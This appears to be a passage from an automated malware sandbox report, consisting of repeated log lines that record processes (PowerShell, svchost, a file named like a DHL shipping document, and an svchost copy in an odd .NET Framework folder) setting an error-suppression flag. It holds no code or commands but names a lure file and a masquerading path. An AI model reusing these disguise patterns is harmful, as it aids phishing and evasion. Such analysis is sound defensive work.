Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
